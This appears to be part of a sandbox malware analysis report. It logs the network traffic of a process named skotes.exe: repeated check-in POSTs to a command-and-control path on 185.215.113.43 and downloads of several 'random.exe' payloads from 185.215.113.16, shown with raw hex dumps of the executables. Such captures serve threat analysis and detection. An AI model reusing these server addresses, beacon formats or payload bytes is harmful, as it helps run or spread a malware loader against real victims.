Dec 17, 2024 06:03:56.633043051 CET	1236	IN	Data Raw: 3f 8d 1f 16 22 c8 2f 97 8f ea ec b9 ea 19 d8 1e a6 23 8b cf 41 d4 3e 37 41 ab f8 02 22 17 99 9a 65 94 96 0a fc bc 19 21 97 02 5b 93 34 8d bd 7b 02 fb 29 d5 81 d9 4e 8b 3a 92 23 28 8a 31 bf ce db 16 d8 ec a8 b4 27 d4 17 11 63 a5 5d f8 3c 6c f5 a2 Data Ascii: ?"/#A>7A"e![4{)N:#(1'c]<l [>oX9S$v1Vlu[}Kny+{o :.ER;Q?$#H6*j$}#7^#[[1F2YnmZF([5Y
Dec 17, 2024 06:03:56.633095980 CET	1236	IN	Data Raw: ca 64 54 ad 15 51 e1 be 08 e1 0d 95 7f a0 be 10 24 13 72 6e 94 6f 27 db 67 28 27 fe 46 0a c8 ce 37 07 2b ed 49 37 a9 cf 3a ef 43 b5 41 a4 6b 4f 98 94 16 56 16 ef 0a 08 9b 9f 54 4f a9 73 4b 1f 6b 66 55 8b e5 96 4e 90 8b b2 3b 20 cb 7a a2 ab 3c b0 Data Ascii: dTQ$rno'g('F7+I7:CAkOVTOsKkfUN; z<9QE5w55\|Uq{{/Eg~xvfFldtBWzCx>^s)k:duN WpneYlGgv7F"\|ort3JJ-Wa%#O::e
Dec 17, 2024 06:03:56.633105993 CET	1236	IN	Data Raw: 1e b2 a8 c7 26 53 29 17 81 37 67 51 e7 f7 ef 76 57 95 e7 54 e1 59 44 08 f3 4e 3c f4 37 58 56 18 71 4d 42 8b 1e 19 0d fb d4 56 db 5d 15 c2 3c 31 16 9b 41 fe a8 ef ef 79 dc 61 6d af 51 e2 64 5f 5d b6 94 7a 75 d9 42 ad 41 f1 78 fd 99 eb 97 3f 07 1f Data Ascii: &S)7gQvWTYDN<7XVqMBV]<1AyamQd_]zuBAx?!IIlb2[4d<ekHqfYZw3Q$xaD5x&@?.H"_.TN;fz(v%CN~smDfQ-OId9hx@)f(QB
Dec 17, 2024 06:03:56.633253098 CET	1236	IN	Data Raw: a3 2d 42 db c1 32 12 8d 1c de 8a 17 d6 8a 97 da 6c f5 dc 0c b8 d5 f1 6e a7 d8 4d 27 20 ff 8e d8 a4 b2 49 a3 8d a7 ff ed 03 55 71 de 3a 34 33 76 5a 5e f6 08 54 77 61 15 f5 15 19 95 f1 e2 2f c2 ee f9 bb a0 76 12 7b dc a5 eb e6 83 11 b4 ec c9 4d a4 Data Ascii: -B2lnM' IUq:43vZ^Twa/v{Mmu+VSBWAU^:s7mT%Qs-qRGV?R%rhF/+mB`_w$b-iC!x:s;->R_"m'?7/
Dec 17, 2024 06:03:56.633308887 CET	1236	IN	Data Raw: 81 e0 5d 1c 41 fa 63 7c d2 3e 15 9d 79 cc f8 c9 5e e6 db c9 9c 7d df 3c 05 47 bc 27 c9 e1 4e 7f 77 bb f5 19 0b 26 7f a5 ff 04 2e 56 7d 22 17 33 93 fd 7f 62 f6 bc 98 5b c7 8d ea 3b 5e 35 5e 32 0e d8 15 57 80 dc 3e 94 83 5b 1a 79 3a 5b 98 d7 4d 1e Data Ascii: ]Ac\|>y^}<G'Nw&.V}"3b[;^5^2W>[y:[M_eZe+Kq~gFTP~toro0\1Ja+&,]\0lgSI`HYG[+3O1h~;D8(.<@J+{&6.6
Dec 17, 2024 06:03:56.633321047 CET	1236	IN	Data Raw: 5d c8 a3 ab 3d 83 32 97 32 3f 69 6c 69 fd b0 f6 39 88 af 90 8d e6 62 20 ba bf 42 ae 3d 72 da bc 23 c7 be 3c 63 8a 77 92 08 30 50 bf f5 22 f9 44 c6 ba 98 86 1f 70 9f 66 63 7a 06 2d 86 13 bd 22 02 4a a6 8d 05 84 75 1c 20 85 10 f2 5f 99 24 18 30 c3 Data Ascii: ]=22?ili9b B=r#<cw0P"Dpfcz-"Ju _$06I\,!y\bAG)}:-@MSEYBSHLD__jMMqWfkxur!dF]E@flj84Nbc+27-j1&B/5k?
Dec 17, 2024 06:03:56.753128052 CET	1236	IN	Data Raw: d1 88 56 1c 2f 2b 19 0b 5c bc af 00 77 bd 7e cd fc da 3e f6 50 d8 f8 5b bc af 79 f8 f9 90 eb 09 26 28 b8 87 4a 1c c2 2d 7a 32 99 f9 23 ed 33 0f 55 d6 00 93 a0 d7 d7 01 b5 a6 22 02 21 f6 d4 ae f6 83 97 6a 3e 8b 2e fc a1 d9 35 3c 94 2f 6b d9 29 59 Data Ascii: V/+\w~>P[y&(J-z2#3U"!j>.5</k)Y{bc"z\|n!#r3:!>Wd8TaBY9}'9~de_}CCPEJ<WN_pm#nqo7e"9}q opPd&7/zf*v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49953	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:56.604228973 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016493001&unit=246122658369
Dec 17, 2024 06:03:57.937807083 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49958	185.215.113.16	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:03:58.209214926 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 17, 2024 06:03:59.557446957 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:03:58 GMT Content-Type: application/octet-stream Content-Length: 2959872 Last-Modified: Tue, 17 Dec 2024 04:41:09 GMT Connection: keep-alive ETag: "676100e5-2d2a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 60 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 50 00 00 04 00 00 ee ab 2d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg*`P@P-@M$a$$ $h@.rsrc$x@.idata $\|@doyjdknv+$+~@vjvesdafPP-@.taggant0`P"-@
Dec 17, 2024 06:03:59.557465076 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:59.557502985 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:59.557555914 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:03:59.557569027 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: >y]%dblA=fehc]X
Dec 17, 2024 06:03:59.557579041 CET	1236	IN	Data Raw: 17 01 2b b5 64 15 0a 97 bd 26 b6 13 0f 29 a5 9b bf 6a a9 e4 be 9b 3e eb 55 fd a5 36 be 2b 3a 04 d6 69 ed 1a 17 d6 32 76 17 e5 0a ef d6 49 8c 75 91 14 e2 a8 f3 ee 8b 5e 60 95 28 8c 2d c9 f1 54 3d 33 36 b1 e8 7c fc 38 c0 f3 de f4 d8 f5 8d 90 ca c3 Data Ascii: +d&)j>U6+:i2vIu^`(-T=36\|8lM;9Q}ewZ%+47:\>zHb\|$>&>C94fA\oP%1z2FyW/13.MWUx;sR AZ5p]9jldDfi2 Mac gfAja50b4B
Dec 17, 2024 06:03:59.557590008 CET	1236	IN	Data Raw: 8d f5 63 68 60 84 92 4b 1b 99 01 7b 29 e3 1b 21 ea 4c e7 61 b8 43 57 89 c5 40 ea ba 97 8c 6f dc c0 58 41 1d f0 14 b6 24 e5 c9 a4 c8 fe a7 9c b6 dd 39 6c bf ce 35 09 15 e7 49 a5 d5 1d b4 b7 bc d8 dd 48 e2 18 3c da 26 65 b8 0b 89 62 e0 f2 3d 0d c9 Data Ascii: ch`K{)!LaCW@oXA$9l5IH<&eb=]K:2%r1NE%FKJ`l~iu#]&8~\|UZsT0Z,W\|<]CRwhA-#9I\|OKmaudYABoI9x#4
Dec 17, 2024 06:03:59.557816029 CET	1236	IN	Data Raw: d5 34 c4 5e 06 a5 44 86 fb 29 0a 74 21 2d 8b b5 ed e2 d5 e8 46 91 22 a7 d3 15 39 c1 dd ff 93 a7 07 1b 26 7b 09 33 16 e8 0d 09 dc e9 cd 93 ec 68 ce d5 0c 2d 62 30 0f 49 a7 66 8a e9 d3 a1 09 f5 60 43 41 77 26 82 6a a7 d3 81 39 a1 27 2d 2b 77 26 cd Data Ascii: 4^D)t!-F"9&{3h-b0If`CAw&j9'-+w&Ja9nkdHl9u_CwVBmG:$*]7b:C<2ytI"58y8SB"9bIQf!G{NYK?ML!8]b'#i3l#OG-GK2rGA
Dec 17, 2024 06:03:59.557826996 CET	1236	IN	Data Raw: 67 26 e2 e8 ce d5 07 0d 22 19 fb 9e 36 c1 38 75 45 bd 12 ae 17 33 38 44 35 41 6a e9 6d c9 f2 60 1f 88 36 35 d4 32 46 5d b5 cd b2 1b d6 35 81 75 5e f5 ca 0c c7 49 1c 65 7d 71 3a cb 64 dd 41 dc b9 87 0c 29 61 33 74 75 02 b4 36 a5 ce 32 f6 74 39 c9 Data Ascii: g&"68uE38D5Ajm`652F]5u^Ie}q:dA)a3tu62t9z{88a3D-AnM'JGuB8i^0u[)9+R2{\"E/7a3_/b1AP?J){<7(G~taIt7}6.:Y1;7a5GZiYC
Dec 17, 2024 06:03:59.557841063 CET	1236	IN	Data Raw: 96 40 38 84 d5 55 a6 12 e5 b4 97 44 26 1b 66 b9 45 f9 50 6a 36 11 b6 75 d3 32 0a 5d 69 ce b9 36 21 23 51 55 61 3a ea 43 d1 cf 3c cf be 83 86 a7 26 11 38 35 47 16 86 5c 17 e0 e8 76 e2 47 42 70 b9 2a 38 75 5d c9 c2 a8 91 49 03 8d 37 a2 92 74 2d 4a Data Ascii: @8UD&fEPj6u2]i6!#QUa:C<&85G\vGBp8u]I7t-Jx_8u!'I)Jl(m$DmI2]iJ'C,{j-]gXkvUG9Z2AEz6EDekIj2%uC>]L5)".8)85b~tI\|qBSL
Dec 17, 2024 06:03:59.677323103 CET	1236	IN	Data Raw: 9d 60 c6 b9 67 49 41 91 a1 15 0b 61 80 8d 28 2d 67 65 8c 2b d5 89 36 39 0f 89 26 66 9a 4d ad a0 48 02 06 6d 75 3a 8f ad 9c 6e 4c 90 cf a3 d7 48 e8 c5 02 40 2e 50 89 7f f2 51 63 16 43 99 9a 4d 8a 60 92 b2 5f a0 f4 11 6c 5f e0 dd 45 3e ce 78 66 fb Data Ascii: `gIAa(-ge+69&fMHmu:nLH@.PQcCM`_l_E>xfK1\0DE}.om\|ESV(a"hcZ.f=E2 4~9_"^Bie>95I#(!_I'EfZR2a^`N6Id

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49983	185.215.113.43	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:07.121607065 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016494001&unit=246122658369
Dec 17, 2024 06:04:08.465212107 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:04:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49988	185.215.113.16	80	2704	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:08.592595100 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 17, 2024 06:04:09.922384024 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:04:09 GMT Content-Type: application/octet-stream Content-Length: 970240 Last-Modified: Tue, 17 Dec 2024 04:39:04 GMT Connection: keep-alive ETag: "67610068-ece00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 00 61 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELYag"w@0=]@@@d\|@Pbu4@.text `.rdata@@.datalpH@.rsrcPb@d@@.relocuvX@B
Dec 17, 2024 06:04:09.922487020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Dec 17, 2024 06:04:09.922525883 CET	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Dec 17, 2024 06:04:09.922595978 CET	1236	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Dec 17, 2024 06:04:09.922631025 CET	1236	IN	Data Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7 Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
Dec 17, 2024 06:04:09.922667027 CET	1236	IN	Data Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91 Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
Dec 17, 2024 06:04:09.922754049 CET	1236	IN	Data Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04 Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
Dec 17, 2024 06:04:09.922787905 CET	1236	IN	Data Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10 Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
Dec 17, 2024 06:04:09.922823906 CET	1236	IN	Data Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0 Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
Dec 17, 2024 06:04:09.922858953 CET	1236	IN	Data Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19 Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
Dec 17, 2024 06:04:10.042248011 CET	1236	IN	Data Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9 Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V\|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M

Session ID	Source IP	Source Port	Destination IP	Destination Port
17	192.168.2.5	50006	185.215.113.43	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:14.295769930 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 36 34 39 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1016495001&unit=246122658369

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.5	50045	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 06:04:19.491786957 CET	54	OUT	GET /off/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 17, 2024 06:04:20.832614899 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 17 Dec 2024 05:04:20 GMT Content-Type: application/octet-stream Content-Length: 1717760 Last-Modified: Tue, 17 Dec 2024 04:39:31 GMT Connection: keep-alive ETag: "67610083-1a3600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 44 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 44 00 00 04 00 00 ad ae 1a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 44 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$`D `@ D`Ui`D @ @.rsrcD`2@.idata 6@ )8@cllxmxcj`*:@xpgytcmm @D@.taggant@`D"@
Dec 17, 2024 06:04:20.832727909 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.832745075 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.832763910 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.832803965 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.832833052 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.832860947 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.833009005 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 17, 2024 06:04:20.833026886 CET	1236	IN	Data Raw: 63 9f a7 0d 94 bb ac 23 24 c2 42 ba 35 27 60 64 ea ea af 97 c8 21 ba af db ee fc b8 58 6c df 69 99 f6 17 ad d9 63 99 6c 2a 7b df 79 1b 0a a8 ae e1 22 ac f8 d2 c8 d2 6d 57 e5 79 03 d7 10 6d 65 33 5e c0 a5 52 af 99 35 95 20 41 be 50 49 ac 34 b2 a0 Data Ascii: c#$B5'`d!Xlicl*{y"mWyme3^R5 API4PZ}QtPmVyO,>Up?z+MpxC2Ja>(_ hA1P3"3y]HRJaCi2,QbZ`Y,85I3<#
